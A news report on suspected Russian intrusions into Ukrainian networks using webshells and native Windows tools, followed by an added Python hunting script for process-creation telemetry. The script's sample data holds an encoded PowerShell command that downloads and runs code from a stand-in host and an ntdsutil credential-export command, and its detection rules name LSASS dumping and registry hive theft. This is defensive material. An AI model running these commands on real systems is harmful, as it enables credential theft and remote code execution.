Suspected Russian hackers breached Ukrainian networks this summer using ordinary administrative tools to steal data and remain undetected, researchers have found.

According to a report by cybersecurity firm Symantec, the attackers targeted a large Ukrainian business services company and a local government agency in two separate incidents earlier this year. What makes these attacks notable is that the hackers deployed little custom malware and instead relied heavily on so-called “living-off-the-land” tactics: using legitimate software already present in the victims’ networks, which leaves few of the file-based artifacts that antivirus and indicator-based detection depend on.

“While most of the malicious activity on the targeted network involved living-off-the-land and dual-use tools, the attackers did deploy a number of suspicious executables, which were most likely malware, and several PowerShell backdoors,” researchers said, adding that these tools “have yet to be obtained for analysis.”

Symantec said the attackers gained access to the business services firm by planting webshells on public-facing servers, likely exploiting unpatched vulnerabilities. A webshell is a malicious script placed on a web server that lets an attacker run commands on it through ordinary web requests, giving persistent remote access that blends in with normal traffic.

One of the webshells, known as Localolive, has previously been tied by Microsoft to Sandworm, a notorious Russian military hacking unit accused of carrying out some of the most disruptive cyberattacks in Ukraine and abroad. While Symantec could not confirm a direct link to Sandworm, the company said the activity appeared to originate from Russia.

Sandworm, which Western governments say operates under Russia’s GRU military intelligence agency, has been blamed for power grid blackouts in Ukraine and for the AcidRain wiper malware that knocked thousands of Viasat satellite modems offline at the start of Moscow’s full-scale invasion.
“The attackers demonstrated an in-depth knowledge of Windows native tools and showed how a skilled actor can advance an attack and steal sensitive information, such as credentials, while leaving a minimal footprint on the targeted network,” the researchers said.

The targeted organizations were not named, and it remains unclear what information, if any, was stolen.

Ukraine’s cyber authorities have repeatedly warned that Russia continues to mount aggressive hacking campaigns alongside its military operations. Earlier this month, Ukraine’s CERT-UA reported that the number of cyberattacks targeting Ukrainian entities exceeded 3,000 in the first half of 2025, up 20 percent from a year earlier.

Western researchers, including Google’s threat intelligence team, have described Sandworm as the Kremlin’s most dangerous cyber unit, engaged in a full spectrum of operations from espionage and sabotage to disinformation campaigns.
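The behaviour described above (a webshell on a public-facing server spawning built-in tools, PowerShell used as a backdoor, credentials taken with native utilities) is what a detection engineer would hunt for in process-creation telemetry rather than in file signatures. The script below is an added example written for this page; it is not Symantec's, Microsoft's or any vendor's tooling, and it makes no claim about the specific tools used in these intrusions. It runs a few hunting rules over constructed process-creation records whose field names are loosely modelled on Sysmon Event ID 1; the hostnames, timestamps and the 192.0.2.10 URL in the sample data are invented.

```python
import base64
import re
from dataclasses import dataclass

# Processes that host web applications. A webshell executes inside one of these,
# so any shell or admin tool they spawn is suspect.
WEB_SERVER_PROCS = {"w3wp.exe", "httpd.exe", "nginx.exe", "tomcat.exe", "tomcat9.exe"}

# Dual-use / living-off-the-land binaries a webshell commonly launches.
LOLBINS = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "whoami.exe", "net.exe", "net1.exe",
    "nltest.exe", "certutil.exe", "bitsadmin.exe", "reg.exe", "rundll32.exe",
    "ntdsutil.exe", "tasklist.exe", "systeminfo.exe", "wmic.exe",
}

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...)
# and of -WindowStyle (-w, -win ...), so match the prefix rather than the full switch.
ENCODED_ARG = re.compile(r"(?i)(?:^|\s)-e[a-z]*\s+([A-Za-z0-9+/=]{16,})")
HIDDEN_ARG = re.compile(r"(?i)(?:^|\s)-w[a-z]*\s+hidden\b")

# Credential theft with nothing but native tools, which is the point of living off the land.
CREDENTIAL_PATTERNS = [
    (re.compile(r"(?i)ntdsutil.*\bifm\b"), "ntdsutil IFM export of ntds.dit (domain credentials)"),
    (re.compile(r"(?i)\breg(?:\.exe)?\s+save\s+hklm\\(?:sam|security|system)\b"),
     "registry hive save (SAM/SECURITY/SYSTEM)"),
    (re.compile(r"(?i)rundll32.*comsvcs.*minidump"), "comsvcs.dll MiniDump of LSASS"),
]


@dataclass
class ProcEvent:
    """One process-creation record (fields modelled on Sysmon Event ID 1)."""
    ts: str
    host: str
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def decode_encoded_command(command_line: str):
    """Return the plaintext of a -EncodedCommand payload, or None if absent or invalid."""
    m = ENCODED_ARG.search(command_line)
    if not m:
        return None
    try:
        # PowerShell encodes the script as UTF-16LE before base64.
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(ev: ProcEvent) -> list:
    """Return human-readable findings for one event (empty list means nothing suspicious)."""
    findings = []
    parent, child = basename(ev.parent_image), basename(ev.image)
    if parent in WEB_SERVER_PROCS and child in LOLBINS:
        findings.append(f"web server process {parent} spawned {child}")
    if child in {"powershell.exe", "pwsh.exe"}:
        decoded = decode_encoded_command(ev.command_line)
        if decoded is not None:
            findings.append(f"encoded PowerShell command: {decoded}")
        if HIDDEN_ARG.search(ev.command_line):
            findings.append("PowerShell launched with a hidden window")
    for pattern, label in CREDENTIAL_PATTERNS:
        if pattern.search(ev.command_line):
            findings.append(label)
    return findings


def scan(events):
    """Run classify over a batch and keep only the events that produced findings."""
    hits = []
    for ev in events:
        findings = classify(ev)
        if findings:
            hits.append((ev.ts, ev.host, findings))
    return hits


# Constructed sample telemetry: hosts, times and the 192.0.2.10 URL are invented.
ENCODED_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/u')".encode("utf-16-le")
).decode()

SAMPLE_EVENTS = [
    ProcEvent("2025-07-01T09:12:03Z", "WEB01", r"C:\Windows\System32\inetsrv\w3wp.exe",
              r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami /all"),
    ProcEvent("2025-07-01T09:12:09Z", "WEB01", r"C:\Windows\System32\inetsrv\w3wp.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              f"powershell.exe -nop -w hidden -enc {ENCODED_PAYLOAD}"),
    ProcEvent("2025-07-01T09:40:51Z", "DC01", r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\ntdsutil.exe",
              r'ntdsutil.exe "ac i ntds" "ifm" "create full C:\Windows\Temp\s" q q'),
    ProcEvent("2025-07-01T10:02:17Z", "WS07", r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\cmd.exe", "cmd.exe /c dir"),
    ProcEvent("2025-07-01T10:05:00Z", "WS07", r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"),
]

if __name__ == "__main__":
    for ts, host, findings in scan(SAMPLE_EVENTS):
        print(f"{ts} {host}: " + "; ".join(findings))
```

The rules key on parent-child relationships and command-line content rather than on file hashes, which is why they still fire when no malware is dropped. In production they need tuning: a web server that legitimately shells out (build or deployment jobs) will trip the first rule, and a single level of ancestry is not enough once the attacker has moved laterally, so real hunts walk the full process tree and correlate with web server access logs for the request that triggered each spawn.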
Daryna Antoniuk is a reporter for Recorded Future News based in Ukraine. She writes about cybersecurity startups, cyberattacks in Eastern Europe and the state of the cyberwar between Ukraine and Russia. She previously was a tech reporter for Forbes Ukraine. Her work has also been published at Sifted, The Kyiv Independent and The Kyiv Post.